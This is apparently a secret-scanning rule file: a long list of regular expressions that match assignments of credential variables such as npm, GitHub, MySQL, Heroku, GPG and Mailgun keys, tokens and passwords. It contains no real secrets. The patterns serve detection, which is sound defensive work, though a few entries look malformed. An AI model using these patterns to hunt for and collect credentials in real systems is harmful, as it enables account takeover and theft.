- - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?passwordtravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?nexuspassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?nativeevents[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kubeconfig[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
